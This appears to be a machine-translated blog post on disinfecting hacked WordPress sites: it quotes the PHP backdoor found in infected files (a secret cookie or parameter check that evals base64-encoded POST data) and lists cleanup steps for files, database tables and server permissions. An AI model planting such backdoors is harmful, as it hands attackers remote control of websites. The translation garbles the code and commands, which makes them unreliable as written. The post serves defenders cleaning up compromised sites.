WordPress Exploit - лечение зараженных файлов и SQL Server безопасности.

Прежде, чем Вы читаете это сообщение, вы должны увидеть , Чтобы что-то понять. :)

Мы обнаружили, что в нескольких блогах на файлы stealthsettings.com, похожий на приведенный ниже код virusarii возникнуть в связи с WordPress эксплуатировать.:

<? Php если ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {Eval (base64_decode ($ _ POST [ 'файл'])); выход; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

XMLRPCЕсли она выше файл xmlrpc.php от СонныйНо в GREP сервер, вы можете видеть, что есть довольно много такого рода в исходном коде.

pppffiuuu

Лечение зараженных файлов:

Ooookkkk ...
1. Лучшее решение, после того, как было резервная копияИ очищать базу данных, чтобы вытирать Файлы WordPress (Вы можете оставить WP-config.php и файлы, которые не относятся строго WP платформе, после того, как тщательно проверена) на сервере и загрузить оригинальную версию 2.5.1 (В течение этого сделать WP обновления версии :)) http://wordpress.org/download/ . Протрите включая файлы темы, если вы не уверены, что их тщательной проверки.

Кажется, были затронуты и файлы темы, которые не были использованы, прежде чем на блоге и просто меняя тему, не решает проблемы.

./andreea/wp-content/themes/default/index.php:<?php если ($ _ COOKIE ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {Eval (base64_decode ($ _ POST [' файл '])); EXIT; ?}?> <Php get_header (); ?>

2. Поиск и удаление всех файлов, содержащих: * _new.php, _old.php *, * Jpgg, Giff *, * Pngg и файл WP-info.txt, если таковые имеются....

Найти. -Name "* _new.php"
Найти. -Name "* _old.php"
Найти. -Name "*. Jpgg"
Найти. -Name "* _giff"
Найти. -Name "* _pngg"
Найти. -Name "WP-info.txt"

3. в / Tmp , Поиск и удаление папок, как tmpYwbzT2

SQL очистки :

1. В таблице Таблица wp_options Смотрите, если есть удалите строки: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Кроме того, в wp_options, перейдите к active_plugins и удалять, если есть плагин, который заканчивается в одном из расширений * _new.php, _old.php *, *. jpgg, *. Гифф, *. pngg или если другое расширение подозреваемых, тщательно проверить.

3. В Таблице wp_users, Смотрите, если есть пользователь, который ничего не написал в своем праве, колонка user_nicename. Удаление этого пользователя, но обратите внимание на номер ID колонки. Пользователь может использовать "WordPress", как user_login и, кажется, созданных на 00: 00: 00 0000-00-00.

4. Перейти к таблице wp_usermeta и удалить все линии, принадлежащие ID выше.

После того как вы сделали это SQL очистки, отключить, а затем включить некоторые плагин. (В блоге -> Панель управления -> Plugins)

Безопасный сервер:

1. Посмотрите, что каталоги и файлы "записи»(Chmod 777) и попытаться положить на них CHMOD , что не позволяет их написания на любом уровне. (644 CHMOD, например)

Найти. -Пермь-2-LS

2. Посмотрите, что файлы имеют бит SUID или SGID . Если вы не используете эти файлы положить на них CHMOD 0 или удалить пакет, который она содержит. Очень опасны, потому что они выполняют привилегии "группа"Или"корень"И не с нормальными пользовательскими привилегиями для выполнения этого файла.

Найти / типа F-Пермь-04000-LS
Найти / типа F-Пермь-02000-LS

3. Проверьте, какие порты открыты и попытаться закрыть или защитить тех, которые не используются.

NetStat-| Grep-я слушаю

О его. Понимаю Google Search и др. сказать: "Ну что вы сделали!». Ну хорошо вы сделали ... но что делать, если Google начнет запретить Все сайты формирование Является спамом и положить трояны (Trojan.Clicker.HTML) В печенье?

WordPress Exploit - лечение зараженных файлов и SQL Server безопасности.

Об авторе

Хитрость

Страстно обо всем, что означает гаджеты и ИТ, я пишу с удовольствием stealthsettings.com из 2006, и мне нравится открывать вам новые вещи о компьютерах и операционных системах macOS, Linux, Windows, iOS и Android.

1 Комментарий

Оставить комментарий